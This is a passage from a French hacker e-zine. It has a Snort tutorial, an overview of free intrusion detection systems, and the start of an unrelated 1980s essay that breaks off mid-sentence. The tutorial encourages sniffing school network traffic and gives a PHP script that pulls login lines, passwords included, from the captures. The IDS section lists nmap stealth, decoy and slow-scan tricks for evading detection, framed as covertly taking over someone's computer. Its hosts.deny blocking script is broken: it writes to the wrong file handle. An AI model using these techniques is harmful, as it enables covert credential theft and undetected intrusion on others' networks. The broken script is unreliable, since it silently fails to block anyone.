vous donnera une  petite  idee  de  s'que  vous permetras un telle 
logiciel sur un  reseau  scholair  puisque,  vous pouvez sniffer a
partir de nimporte quel poste du reseau. Faire  fonctionner  snort
en fonction sniffer est en soit un jeu d'enfant. 

bash-2.05# snort -i eth0 -de -l /root/log &

-i pour l interface reseau,  si  ce n'est pas specifier, la config
de snort par defaut  indique  toute les interface par defaut. Donc
c'est pas si mal d'oublier le -i eth0 (ou eth1  ou ed0 (freebsd)).

-de pour capturer et diviser les packet

-l pour indiquer dans  quel  repertoir  logger. /var/log peu aussi
etre une bonne option, mais outre respecter les standarts ce n'est
pas vraiment important. lesquade ISO9002  debarquera pas chez vous
si vous ne respectez pas ces standard. Maintenant allons portee un
oeuil au resultat.


bash-2.05# cd /root/log/
bash-2.05# ls
142.137.6.42     192.168.1.5   205.237.62.134   255.255.255.255  66.130.146.134
142.166.200.213  192.168.1.6   207.253.0.36     64.12.24.18      ARP
192.168.1.1      193.110.95.1  216.208.126.162  64.4.12.127      
bash-2.05#


snort creer un repertoir  pour  chaque  IP,  ainsi  on  si peu  si 
retrouver assez facilement. Bien sur  ca  aide de connaitre  le ip
de la connection  qui  nous  interresse.  Pour  l'exemple je  vais 
utiliser  IRC  car  sont  protocole  est  simple  et  humainement 
comprehensible et surtout connu de la plus par de nos  lecteur. Un
moyen  simple  de  connaitre  le  ip  de  sont   serveur  irc  est 
simplement de faire un /dns de celui ci sur celui  ci, dans le cas
present :

/dns geneva.ch.eu.undernet.org
*** Looking up geneva.ch.eu.undernet.org
-
*** Resolved geneva.ch.eu.undernet.org to 193.110.95.1

miracle le repertoir existe (on sent doutais un  peu, surtout  que
c'est un exemple en environement controler). 

bash-2.05# cd 193.110.95.1/
bash-2.05# ls
TCP:6668-1083
bash-2.05#


tout les log de  snort  sont  presenter  dans  le  format  suivant
protocole-port-id, dans  le  cas   present   ce  n'est  pas   tres
difficile de se retrouver mais prenons l'exemple suivant


bash-2.05# cd 66.130.146.134/
bash-2.05# ls
TCP:1098-80     TCP:46930-9113  TCP:47713-9708   TCP:49734-11214  TCP:50517-11581  TCP:51300-12006
TCP:1099-80     TCP:46931-9114  TCP:47714-9709   TCP:49735-11215  TCP:50518-11582  TCP:51301-12007
TCP:1152-110    TCP:46932-9115  TCP:47715-9710   TCP:49736-11216  TCP:50519-11583  TCP:51302-12008
TCP:1153-110    TCP:46933-9116  TCP:47716-9711   TCP:49737-11217  TCP:50520-11584  TCP:51303-12009
TCP:1154-110    TCP:46934-9117  TCP:47717-9712   TCP:49738-11218  TCP:50521-11585  TCP:51304-12010
TCP:1155-110    TCP:46935-9118  TCP:47718-9713   TCP:49739-11219  TCP:50522-11586  TCP:51305-12011
TCP:1156-110    TCP:46936-9119  TCP:47719-9714   TCP:49740-11220  TCP:50523-11587  TCP:51306-12012
TCP:1157-110    TCP:46937-9120  TCP:47720-9715   TCP:49741-11221  TCP:50524-11588  TCP:51307-12013
TCP:1161-110    TCP:46938-9121  TCP:47721-9716   TCP:49742-11222  TCP:50525-11589  TCP:51308-12014
TCP:1162-110    TCP:46939-9122  TCP:47722-9717   TCP:49743-11223  TCP:50526-11590  TCP:51309-12015
TCP:1163-110    TCP:46940-9123  TCP:47723-9718   TCP:49744-11224  TCP:50527-11616  TCP:51310-12016
TCP:1164-110    TCP:46941-9124  TCP:47724-9719   TCP:49745-11225  TCP:50528-11617  TCP:51311-12017
TCP:1165-110    TCP:46942-9125  TCP:47725-9720   TCP:49746-11226  TCP:50529-11618  TCP:51312-12018
TCP:1166-110    TCP:46943-9126  TCP:47726-9721   TCP:49747-11227  TCP:50530-11619  TCP:51313-12019
TCP:1167-110    TCP:46944-9127  TCP:47727-9722   TCP:49748-11228  TCP:50531-11620  TCP:51314-12020
TCP:1168-110    TCP:46945-9128  TCP:47728-9723   TCP:49749-11229  TCP:50532-11621  TCP:51315-12021
TCP:1169-110    TCP:46946-9129  TCP:47729-9724   TCP:49750-11230  TCP:50533-11622  TCP:51316-12022
TCP:20034-2800  TCP:46947-9130  TCP:47730-9725   TCP:49751-11231  TCP:50534-11623  TCP:51317-12023
TCP:34233-6667  TCP:46948-9131  TCP:47731-9726   TCP:49752-11232  TCP:50535-11624  TCP:51318-12024
TCP:34239-6667  TCP:46949-9132  TCP:47732-9727   TCP:49753-11233  TCP:50536-11625  TCP:51319-12025
TCP:34269-6667  TCP:46950-9133  TCP:47733-9728   TCP:49754-11234  TCP:50537-11626  TCP:51320-11972
TCP:34411-6667  TCP:46951-9134  TCP:47734-9729   TCP:49755-11179  TCP:50538-11627  TCP:51321-11973
TCP:4040-445    TCP:46952-9135  TCP:47735-9730   TCP:49756-11235  TCP:50539-11628  TCP:51322-11974
TCP:4139-445    TCP:46953-9136  TCP:47736-9731   TCP:49757-11236  TCP:50540-11591  TCP:51323-11975
TCP:4308-443    TCP:46954-9137  TCP:47737-9732   TCP:49758-11203  TCP:50541-11592  TCP:51324-11976
TCP:4309-443    TCP:46955-9138  TCP:47738-9733   TCP:49759-11204  TCP:50542-11593  TCP:51325-11977
TCP:4310-80     TCP:46956-9139  TCP:47739-9734   TCP:49760-11205  TCP:50543-11594  TCP:51326-11978



et  ce  n'est  pas fini, bien on pourrais  dire  qu'on est content
d'avoir au  moin  le port, pour les curieux ils sagit de  mes  log
sur hotmail. Bon retournons a nos moutons. Tout ce que  vous  avez
a faire, c'est  d'ouvrir  le fichier desirer  (TCP:6668-1083  dans
le cas present) avec  votre  editeur  prefere  (pico).  Un  packet 
tipique ressemble a ceci :

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/10-12:22:29.235440 0:50:FC:71:82:FB -> 0:E0:29:76:71:EC type:0x800 len:0x51
192.168.1.5:1083 -> 193.110.95.1:6668 TCP TTL:128 TOS:0x0 ID:65432 IpLen:20 DgmLen:67 DF
***AP*** Seq: 0x30E7029  Ack: 0x9B20E79B  Win: 0x412E  TcpLen: 20
50 52 49 56 4D 53 47 20 23 6D 69 6E 64 6B 69 6E  PRIVMSG #mindkin
64 20 3A 6F 75 6C 61 6F 75 70 0A                 d :oulaoup.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



bref, mois jour heure.vraiment trop  precis  mac  adresse  a   mac 
addresse. moi  (192.168.1.5) sur  le  port  1083  discute   a  irc 
(193.110.95.1)  sur  le  port 6668. plus  precisement  un  message
sur le chan #mindkind  qui  se  concretise par "oulaoup". Pas tres
compliquer a  comprendre  hein ?  Voici  une  string   tout  aussi 
simple a analyser mais pourvu d'un contenue plus  interressant.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/10-12:43:52.097356 0:E0:29:39:20:57 -> 0:5:9A:D4:58:8C type:0x800 len:0x65
66.130.146.134:1083 -> 193.110.95.1:6668 TCP TTL:127 TOS:0x0 ID:20658 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x30E786C  Ack: 0x9B2123AF  Win: 0x41C6  TcpLen: 20
50 52 49 56 4D 53 47 20 58 40 63 68 61 6E 6E 65  PRIVMSG X@channe
6C 73 2E 75 6E 64 65 72 6E 65 74 2E 6F 72 67 20  ls.undernet.org
3A 6C 6F 67 69 6E 20 75 63 20 74 65 73 74 0A     :login uc test.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


c'est  qu'un  exemple,  car  n'y  moi  n'y personne sur mon reseau
local n'a d'access a X undernet. Cependant,  vous  comprendrez que
c'est le principe qui compte et que ca ne s'applique pas seulement
qu'a irc. vous pourriez par  exemple sniffer les connection telnet
sur votre reseau  scholaire.  Le  script  suivant scannera les log
sniffer  pour  vous.  Pour  l'instant  il  ne  s'applique  qua  la 
situation presenter  dans cette article, mais vous verez qu'il est
facilement  modifiable  afin  de  trouver  d'autre  sorte  de data 
interressante. Qui plus est, comme le script est disponible sur le
CVS de mindkind, de nombreux update  seront  fait au fils du temps
afin de le rendre plus performant, precis et varier.


#!/usr/local/bin/php -q
<?php
//var_dump($_SERVER["argv"]);
set_time_limit(0);

$DIVIDE = "=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+";
$KEYWORD = ":login";



$path = $_SERVER["argv"][1];

//print($path);

if ($path == "") {
        die("use is ./snortparse path/file \r\n");
}

$fp = fopen("$path", r) or die ("file won't open");
$buff = fread($fp,9999999);
$packet = explode($DIVIDE, $buff);

//print("$buff \r\n");

for ($x=0;$x<=count($packet);$x++) {
//      print($packet[$x]);
        $words = explode(" ", $packet[$x]);
        for ($z=0;$z<=count($words);$z++) {
//              print("$words[$z]");
                if ($words[$z] == $KEYWORD) {
                        print($packet[$x]);
                }
        }
}
fclose($fp);
?>




part 2 : kick out the script kids and get a beer.



Telle  qu'annoncer  cette  deuxieme  moitier d'article traitera de 
snort en tant tant que IDS (intrusion detection  system)  et  sera
assez simple, car snort n'est pas  tres  compliquer a utiliser. Le
besoin de l'article  vien  du  fait  qu'il  n'existe  aucun code a 
proprement parler adapter a slackware  qui permet d'utiliser snort
dans  la  plenitude  de  sa  capaciter.  Le code soumis ici est en 
version beta, mais tout comme le code de  la section precedante il
sera disponible sur le CVS afin de faciliter  l'access  a de futur
version  ou   pour   vous   permettre  de  soumettre  vos  propres
amelioration

pour que le mode IDS fonctionne, vous devez vous assurez  que  les
fichier   snort.conf    bad-traffic.rules    classification.config  
exploit.rulez   soit  dans   le    meme    repertoire  (enfin  que  
bad-traffic.rules , exploit.rules et   classification.config soit 
dans le meme  repertoire que snort.conf)

snort.conf configure votre  "reseau"  specifie sur quelle addresse
la detection doit se faire.


classification.config renferme les regles par default, indique  la
prioriter a definir a chaque attempt.  Vous  pouvez  ajouter   des
rules dans se fichier, que se soit pour ajouter un type  d'attaque
ou simplement pour modifier la valeur  par  defaut  general  d'une
attaque pour un cas particulier. la  documentation sur le  site de
snort done une exelente idee de comment  batir ces  propres  rulez

bad-traffic.rulez  et  exploit.rules  ce  sont  les  fichiers  qui 
identifie le genre de packet qui est considerer comme malicious.


bon pour lancer snort en fonction NIDS (n stand for network).  

snort -de -c /etc/snort/snort.conf -s -h 192.168.1.0/24 -D

ou alors ajouter dans /etc/rc.d/rc.local

/usr/local/bin/snort -de -c /etc/snort/snort.conf -s -h 192.168.1.0/24 -D

afin qu'il se lance au demarage.


Vous  voici  avec  un  snort  minimaliste.  Mon  prochain  article 
(armoring slackware 3), expliquera en detail   comment  faire  vos
propre regle efficace en donnant en exemple celle  que  j'utilise.
Oui, je  suis  d'accord  la doc de snort explique bien comment les 
faire,  mais ce n'est pas parce qu'on sait comment qu'on sait quoi
faire.  C'est  cette  lacune  que  mon prochain article tentera de
combler.

Pour finir, telle que promis, mon script, a quoi  sert  t'il ?  et
bien il analyse les tentative d'intrusion identifer par  snort  et
ajoute une regles  dans  hosts.deny   lorsque  que  le  danger est
critique (niveau 1) (vous pouvez facilement le  modifier  pour  un
niveau 2  si  vous  etes du genre parano). Ainsi vous vous trouvez
proteger de facon casi  instantaner  face  a  un  aggresseur moyen 
(genre un script kids qui a des bon contacts).


#!/usr/local/bin/php -q
<?php
set_time_limit(0);

$CODRED = "1";

$fp = fopen("/var/log/syslog", "r");

while (1) {
        sleep(15);
        if (!feof($fp)) {
                $line = fgets($fp,9999);
                $words = explode (" ", $line);
                $snort = explode ("[", $words[4]);
                if ($snort == "snort") {
                        $words2 = explode("]", $line);
                        $priority = explode(" ", $words2[3]);
                        if (is_numeric($priority[1]) && $priority[1] <= $CODRED) {
                                $x = count($words);
                                $attacker = $words[$x];
                                $words3 = explode(":", $attacker);
                                $ip = $words3[0];
                                $fp2 = fopen("/etc/hosts.deny", "a+");
                                fwrite($fp, "$ip".":ALL");
                                fclose($fp);
                        }
                }
        }
}

fclose($fp);


?>


Bon  vous  aurez  compris  que  si  vous   voulez   modifier   la 
"sensibilit" du programme, vous n'avez qua changer  la valeur de
$CODRED. Donc sur ce, on se revoit dans Armoring Slackware 3 afin
de rendre notre Snort plus efficace que les settings par default.




 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | Wyzeman                             wyzeman@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|



  < Mindkind tales from IRC >
  en mmoire du meetfest...

  [19:33] (Wyzeman) un souper avec des hot dog gratuis
  [19:33] (mtadbf) hehe
  [19:34] (Wyzeman) des hot dog gpl :]
  [19:34] (Wyzeman) on te donne les source
  [19:34] (Wyzeman) pi faut tu le compile
  [19:34] (mtadbf) ensuite si y te manque des librairie
  [19:34] (mtadbf) tu va les chercher.
  [19:36] (Wyzeman) ben des hot dog gpl, ta le pain la saucice, le bbq,
                    le ketchup, la reliche, la mayo la moutarde pi tu tarrange avec ca

  [19:36] (Wyzeman) ./configure --enable-ketchup --enable-relish --enable-mayo
  [19:36] (mtadbf) beurk
  [19:37] (mtadbf) --disable-relish
  [19:37] (mtadbf) --enable-chesswiz
  [19:37] (Wyzeman) -- enable-tranche_de_fromage
  [19:37] (Wyzeman) make && make install
  [19:37] (mtadbf) --disable-lastcallscum
  [19:37] (Wyzeman) whereis hot dog
  [19:37] (Wyzeman) hotdog= /var/tmp/hotdog

  < ----------------------- >
  
                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| screw the ids, by MindFlayR                               / 10.13  /
'          aka: Par en avant comme par en arriere          .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Les administrateurs reseaux cherchent depuis toujours un moyen de 
detecter et repousser les attaques de pirates informatiques le 
plus rapidement possible. Un jour, les programmeurs inventerent les
IDS pour rsoudre le problme. Ouain, mais c'est quoi ca un IDS ?
Bin IDS, c'est pour Intrusion Detection System (ca fais peur en ?).
Ca sert a quoi debord (vu vous parler pas anglais pis vous avez
pas compris). En gros, ca permet de detecter les attaques et de leurs
rpondre de facon tout a fais automatique. Un IDS peut entre autre
dtecter les portscans, analyser le trafic rseau et decouvrir le type
d'attaque lancer contre votre machine. Bien, sur, chaque IDS a son 
propre mode de fonctionnement et aucun ne fais exactement la meme chose.
Je vais donc tenter de vous dcrire la plupart de ces programmes
disponible sur le march du logiciel libre. En gros ceux qui sont
gratuit et/ou le code source est disponible. La raison de ce choix est 
que je ne voulais pas payer une pour tester un IDS commercial (c'est 
TRES cher) et surtout, que ceux gratuit sont aussi, sinon plus 
puissant.


Les IDS fonctionne selon deux mode de fonctionnement.

Les signatures d'attaques
-------------------------
Les IDS fonctionnant sous le principe de la signature d'attaques sont
les plus anciens et les simples. Elle consiste a surveiller la signature
que laisse les attaques connus sur le systeme. C'est ce qu'on appelle
du pattern matching. Cette dmarche applique  la dtection d'intrusion, 
est trs ssemblable  celle des logiciels antivirus et prsente les mme 
inconvnients que celle ci.


Les modles comportementaux
---------------------------
Les IDS a modles comportementaux sont apparus plus rcemment. Ils 
consistent  dtecter si un utilisateur a une attidue ou un 
comportement bizarre ou anormal avec le systeme. Il faut bien sur
que l'IDS apprenne les habitudes des utilisateurs avant de dtecter
quelque chose. Ils demandent cepandant un entretien norme car ils 
ne peuvent faire la diffrence entre une activit anormale et une
attaque en rgle. Ils peuvent cepandant dtecter des attaques 
inconnus auparavent au contraire des IDS fonctionnant par signatures
qui doivent tenir leur base de donns a jour ce qui laisse un certain 
dlai aux attaquants utilisant une vulnrabilit jusque la inconnu.


Les types de IDS
----------------

-Host IDS
-Network IDS
-Hybrid IDS
-File integrity Checkers
-Kernel patch


Host IDS
--------
Les Host IDS detecte les intrusions venant d'host "trusted" a 
l'interieur de votre reseau, ou encore analyse le fonctionnement
des machines sur lequel ils sont installer. Il sont presque toujours 
situ  l'intrieur du rseau.


Network IDS
-----------
Ce type d'IDS enregistre tout le traffic reseau passant a l'endroit
ou l'IDS est installer. Il est normalement situ a l'extrieur du reseau,
avant le firewall. Ils servent surtout a detecter les signatures des
attaques dj connu, identifier les anomalies pouvant tre une nouvelle
vulnrabilit, ou encore a tenter de bloquer les attaques DDoS.
Cepandant, les NIDS font fasse a deux problmes majeurs, c'est a dire
le cryptage des donnes et la difficult croissante de monitorer les 
rseaux. 


Hybrid IDS
----------
Les IDS hybrides sont  la fois compos d'un module network et d'un
module host-based.


File integrity Checkers
-----------------------

Le principe d'un file integrity checker est en fais trs simple.
Il vrifie si les fichiers (le plus souvent les executable)
ont t modifier et ainsi, detecter la prsence d'intrus.
Exemple simple, un rootkit modifie netstat et ls pour
hider les connections venant de 1.2.3.4 ( ip fictif:P ) et pour
que les fichiers semble toujours normaux (par leur taille et leur
date d'installation. Les FIC (c plus court comme ca)
utilisent alors les checksum algorythmique pour vrifier 
l'integrit de vos fichiers. En utilisant plusieurs algorythmes,
ils rendent la tache de l'intrus presque impossible.


Kernel patch
------------
Ce type d'IDS modifie le kernel de linux afin de le rendre plus
scuritaire. Ce ne sont pas vraiment des "vraies" IDS mais elles
permettent d'amliorer la scurit d'un systeme et s'harmonise
trs bien avec les autres types d'IDS.


J'veux pas que ma mre sache que j'ai owner son ordi
----------------------------------------------------

Malheureusement pour vous, votre mre est du genre paranoiaque
et a installer une batterie de defence SAM autour de son lieu 
de travail ce qui interdit l'acces physique. Comme votre mre est 
de plus caller en info, elle a installer plusieurs IDS car elle
redoute une attaque informatique de votre part. Donc comment 
fait-on fais pour pas tre priv de sorti pour la semaine...

Portscan demi-ouvert et furtif
------------------------------
Il faut commencer par portscanner le systme sans se faire dtecter
par les NIDS. Nous pouvons fortement augmenter nos chances  l'aide 
de nmap. Nmap permet diffrent niveau de stealth dans les scans.
Si nous visons un ordi en particulier nous pouvons jumeler
les option -sS (TCP SYN stealth portscan) et -P0 (Don't ping hosts).
Cela reste malheureusement dtectable a l'aide de rgles IDS avanc,
par exemple en notant un nombre lev de SYN packets qui ne sont pas
suivi par une connection.

Nous pouvons aussi utiliser la technique dites de Stealth FIN scan.
Elle consiste en fais en envoyer un packet contenant le flag FIN
vers la box que l'on veux scanner. Si le port ne renvoie pas de 
rponse, le port est ouvert (ou bloquer par un firewall). Si la box
renvoie un packet contenant le flag RST, le port est donc ferm.
Le dfault majeur de cette technique est qu'il ne marche pas sous tous
les OS et donne malheureusement des rsultats inexacts caus par les 
firewall. Cepandant, il est trs furtif et relativement rapide.
commande: nmap -sF www.host.com
Nous pouvons aussi fragmenter ce type de requete pour la rendre encore
plus stealth, cepandant, certain OS n'aime pas se genre de truc donc il
y as des risque de plantages de la machine cible.

L'option decoy (-D) est aussi interessante car elle simule des
dizaines de scan a la fois ce qui permet de "cacher" son scan devant
la masse de fausses alertes que l'IDS recois. Il faut cepandant
utiliser une version rcente de nmap car les vieilles avais le dfault
de donner le meme TTL (Time To Live) a chaque packet ce qui permettais
de dduire que les fake ip utilis en tais justement. Maintenant, nmap
donner une valeur TTL alatoire entre 51 et 65 a chaque fake ip se qui 
rends la tache des IDS plus difficile. Malheuresement, si tous les ip
alatoires crer par nmap s'avre etre down ou impossible, l'IDS peux
alors dtecter la vrai source du scan.
 
Une autre ide intressante est de scanner dans un ordre alatoire
lorsqu'on scan un network. Exemple, au lieu de scanner
66.199.188.1
66.199.188.2
66.199.188.3
etc...

Il faut plutot scanner le network dans le dsordre car certain IDS 
dtecte se genre de scan et hide les box suivantes a l'ip qui scan 
du moment que l'attaque est dtecter. Cela est aussi valable pour 
l'ordre ou les ports sont scanner sur une box prcise.

On peux aussi "ralentir" le scan de facon a ce que l'IDS ne le dtecte
pas car il est hors de la "zone de temps" que l'IDS analyse.

Une option intressante de nmap est le suivant Reverse ident scanning.
Elle est utilisable par la commande: 
nmap -sT -I www.host.com
Cette option permet de savoir qui "own" chaque port dtecter ouvert sur
la machine. Malheureusement, cette technique est facilement dtecter 
par les IDS.

Web Links
---------

Host IDS
--------

Logsurfer
Homepage: http://www.cert.dfn.de/eng/logsurf/
Auteur: Wolfgang Ley, Uwe Ellerman.

Logsurfer permet de monitorer tout les log "texte" de votre systeme
en temps reel. Comme syslogd log a peu prs tout, l'utilit de 
logsurfer est de class ces informatiosn pour vous faire parvenir
que ceux qu'on pourrais considr comme importante.


Snips (ou Nocol)
Homepage: http://www.navya.com/software/snips/
Auteur: Netplex Technologies Inc.

SNIPS (System & Network Integrated  Polling Software) autrefois 
connu sous le nom de NOCOL surveille les activits rseau et 
les dispositifs systmes.


Swatch
Homepage: http://www.oit.ucsb.edu/~eta/swatch/
Auteur; Todd Atkins

The Simple WATCHer and filter est un logwatcher en temps rel
coder en perl. Swatch surveille vos logs pour des triggers que
vous spcifier vous meme.

Network IDS
-----------

Shadow
Homepage: http://www.nswc.navy.mil/ISSEC/CID/
Auteur: NSWC Dahlgren, NFR, NSA, SANS

Shadow possde plusieurs qualits. Il peux d'abord dtecter des attaques
camoufls par plusieurs sources ip diffrentes, meme si celle si provienne
de plusieurs sous-reseau ou meme encore de pays diffrent. Shadow est 
contruis en 2 modules. Le premier, le "senseur" est situ le plus prs
possible du firewall. La deuxime, "l'analyseur", est situ a l'intrieur
du rseau. Shadow a t dvelopp sous Red Hat, il est donc optimiser
pour cette distribution de Linux.

Shoki
Homepage: http://shoki.sourceforge.net/
Auteur: sbp

Shoki est un NIDS fonctionnant par signatures fonctionnant avec tcpdump.
Il est possible de convertir les regles de Snort sous shoki. Il est 
aussi possible de logger le trafic reseau et de faire une database.

Snort
Homepage: http://www.snort.org/
Auteur: Erek Adams, Andrew R. Baker, Brian Caswell, Chris Green, 
Jed Haile, Jeff Nathan, Chris Reid, Marty Roesch, 

Snort est le plus volu et le plus populaire de tout les NIDS. Snort
peux servir de sniffer, de packet logger et de NIDS. Snort fonctionne
par "rgles", ce qui fais que vous devez toujours le maintenir le plus
a jour possible si vous voulez qu'il fasse bien son travail. Snort est
capable de rouler sur des rseaux a haute-vitesse (100Mbits) ce qui
en a fais l'outil de prdilection de plusieurs sysadmin. 

Tamandua NIDS
Homepage: http://tamandua.axur.org/
Auteur: Tamandua Laboratories

Tamandua est un NIDS dvelopper au Brsil. Tamandua fonctionne un peu
sous le meme principe que Snort, c'est a dire par signatures. Il fait
ses rapports en php ce qui pemet de les lire dans une interface web. 


Hybrid IDS
----------

Prelude
Homepage: http://www.prelude-ids.org/
Auteur: Yoann Vandoorselaere ainsi que plusieurs dveloppeurs indpandants

Predule utilise plusieurs senseurs pour capter les informations ncessaires
 son bon fonctionnement. Les senseurs envoie l'information a un manager
qui s'occupe de les classs et de les analyser. Prelude supporte linux et
toute les variantes de bsd.

Psionic's TriSentry suite ou The Abacus Project Tools
Homepage: http://www.psionic.com/abacus/
Auteur: Psionic Technologies

Trisentry est compos de trois modules. PortSentry est un dtecteur de
portscan qui dnie l'accs au systme aux portscanners. La box devient
compltement invisible a l'host qui se fais prendre par PortSentry.
HostSentry lui, est le HIDS. Il sert surtout  dtecter les anomalies
login et  dtecter les comptes compromis. Pour terminer, LogSentry
surveille vos fichiers logs automatiquement et  dtecter les anomalies.


File integrity Checkers
-----------------------


AIDE
Homepage: http://www.cs.tut.fi/~rammer/aide.html
Auteur: Rami Lehti, Pablo Virolainen

AIDE vrifie l'intgrit de vos fichiers en utilisant plusieurs
algorythmes (md5,sha1,rmd160,tiger,haval,etc.). Il est aussi 
possible d'ajouter avec une toute relative facilit d'autres
algorythmes.

chkrootkit
Homepage: http://www.chkrootkit.org
Auteur: Pangeia Informatica

Chkrootkit est une application tentant de dcouvrir si votre box
 t compromis a l'aide d'un rootkit. Il utilise une technique
par "signatures" afin de dcouvrir les applications trojaner.

FCheck
Homepage: http://www.geocities.com/fcheck2000/fcheck.html
Auteur: Michael A. Gumienny

FCheck prends une "photo" de votre file system avant permettant
ainsi de dtecter toute modifications qui pourrais permettre de 
dtecter une intrusion.


Kernel patch
------------

Linux Intrusion Detection System
Homepage: http://www.lids.org/
Auteur: Xie Huagang et Philippe Biondi

What that shit ?
----------------

LIDS est une patch de kernel et un outil d'administration systeme.
LIDS permet proteger ces fichiers importants, meme le root ne peux
modifier les fichier protegers a l'aide de LIDS. LIDS permet aussi
de proteger les process en empechant de les killer et permet aussi
de hidder les process. LIDS fais aussi des alertes de securit au 
niveau du kernel et peux meme detecter les portscans fais a partir 
de votre systeme.

Pourquoi utiliser LIDS ?
------------------------
Car Linux comporte des problemes de scurit inherant a tout les
systemes unix. Le probleme le plus vident tant bien sur la
"toute-puissance" du root sur la machine. Un intrus reussisant
a obtenir l'acces root peux totalement dtruire un systeme ou
tout simplement vous donner assez de maux de ttes pour avaler
toute votre bouteille d'aspirine. LIDS utilise une
"access control list" qui aide a prevenir que ceux qui possede
le status root massacre le systeme. Ceci protegeant les fichiers
comme les process.

Compatibilit
-------------
kernel 2.2.x et 2.4.x
non compatible avec Red Hat, Debian, et Suse car ces distributions 
modifient le kernel.



J'espere avoir clairer votre lanterne sur vos choix d'IDS et surtout
vous avoir convaincu de les utiliser. Une box est si vite rooter de
nos jours qu'il vaux mieux se protger, surtout si notre box possde
des information confidentielles/importantes ou encore qu'on tiens
a ce que notre box ne servent pas a en scanner 40000 autres. (ce qui
peux causer certains problemes avec notre isp/systeme policiaire
prfr.


Merci :
sauron (from cns/minithins), Lance E. Spitzner, Erek Adams, 
Andrew R. Baker, Samuel Dralet, Robert Graham, Rain Forest Puppy
Yves Deswart, Thierry Lecroq Fyodor et  tout ceux que j'oublie 
de mentionner.






 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | MindFlayR                         MindFlayR@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




  < Mindkind tales from IRC >
   
  [01:22] <LastOQP_> quand tu dis string devant un programmeur c okay
  [01:22] <LastOQP_> mais quand tu dis string devant une chix
  [01:22] <LastOQP_> c diffrent.
  [01:22] <LastOQP_> ta dj remarquer a?
  [01:22] <LastOQP_> ahha
  [01:24] <sm1thy> HAHAHAHAHA

  < ----------------------- >



                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Living in the 80s, by LastCall_                           / 10.14  /
'          aka: Elvis y'e tu vivant ?                      .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/

Living in the 80s


En plein mois de dcembre 2001 ya de quoi de bizarre qui m'est arriv.   Je  me
suis mis tout d'un coup  vivre dans les  annes  80.   J'coutais  du  Micheal
Jackson et je trouvais a bon  (mon dieu),  je  trippais  sur la  toune  "Video
Killed the Radio Star" des Buggles (j'en ai mme fait un remake "POO Killed the
Database Star"), j'ai download Ferris Bueller's Day Off en DivX. Ensuite, j'ai
t  la bilio de mon cole pour emprunter 1984 de George Orwell et en  passant
j'ai mis la main sur un livre rouge sur le so called "hacking" datant de  1985.
Ce livre la est tellement vieux et inemprunt que la bilio  allait  le  shipper
au vietnam (riez pas c'est vrai). Hum, selon mes calculs c'est la que  1)  vous
changez d'article paske j'ai pas rapport ou 2) vous pensez que je suis crinqu.
Et bien la bonne rponse c'est 2. Mais j'vais plutt vous raconter  les  annes
80 vu des annes 50, vu des annes 80 et finalement vu d'aujourd'hui les annes
00 (haha). Ouais il va y avoir  du  "hacking",  ouais  il  va  y  avoir  de  la
paranoia. Bon, here we go.


1981 -- Video killed the radio star
     Aot 1981 (j'avais 0,1 an), La chanson "Video Killed the Radio  Star"  des
     Buggles a lanc un projet qui s'appelait MTV. De la musique   travers  le
     cable tl.  partir de cette journe la, la domination  et  la  dictature
     culturelle de la radio AM/FM ft diminue.

     Et oui, le dernier paragraphe est un pseudo-rip-off de ce  qui  est  crit
     dans toute les archives qui parlent de la premire diffusion  de  MTV.  Ce
     message la a un sens trs intressent si on l'applique    Internet.  Vous
     voulez la preuve? http://atomfilms.shockwave.com/af/content/regurge01
     Aller voir ce "flash clip". Exactement le mme sens (m'enfin  s'est  copi
     j'avoue) que le premier vido-clip des annes 1980. Tout  cela  m'amne  
     me demander si Internet a tu la TV et la radio..  et  je  me  dis  OUAIS.
     J'coute presque pu la TV et la radio. Lorsque  je  le  fais,  c  que  je
     suis dans un mouvement vedge et que j'ai pu envie de faire grand  chose...
     Maintenant en 2002 je regarde des DivX, je lis les news  sur  le  web,  et
     j'coute des Mp3. Je choisis ce je veux voir, entendre, lire.  I  got  the
     powa. La TV et la radio tait pas ass personnalises a mon got je crois.

     POO killed the database star. Koic sa? C'est une toune que  j'ai  compos
     et interprt (pour le fun bien sure). Il n'y pas encore de version finale
     mais srement que je vais la faire jouer  31337 radio un jour. L'ide  de
     cette toune la m'est venu avec le fait que de nos jours on ne voit pu  les
     choses    programmer  comme  des  databases,  mais  bien  comme   de   la
     programmation oriente objet. Donc toute a  nous  amne    scrapper  les
     databases relationnelles pour les faire orientes objet. Certain  vont  me
     dire que c'est la mme chose, mais je crois plutt  que  l'approche  objet
     va nous permettre de faire des "base de donnes" plus intelligentes. Voyez
     toute ces "killed something" c'est encore  une  mentalit    la  MTV  des
     annes 80... hehe C'est juste plus slow   s'excuter.  Bon  j'en  reviens
     aux objets. Prenez deux programmeurs, un qui a tjrs  cod  en  relationnel
     avec des tables et  avec  des  procdures  et  un  autre  qui  a  toujours
     conceptualis en UML et coder des classes pour reprsenter les objets. Les
     deux gars vont arriver pour travailler sur le mme  problme  et  conclure
     une  solution  TOTALEMENT  diffrente.   Vous  en  voulez  plus?   Prenons
     l'exemple d'un livre. Le codeur non objet va voir le livre comme tant  un
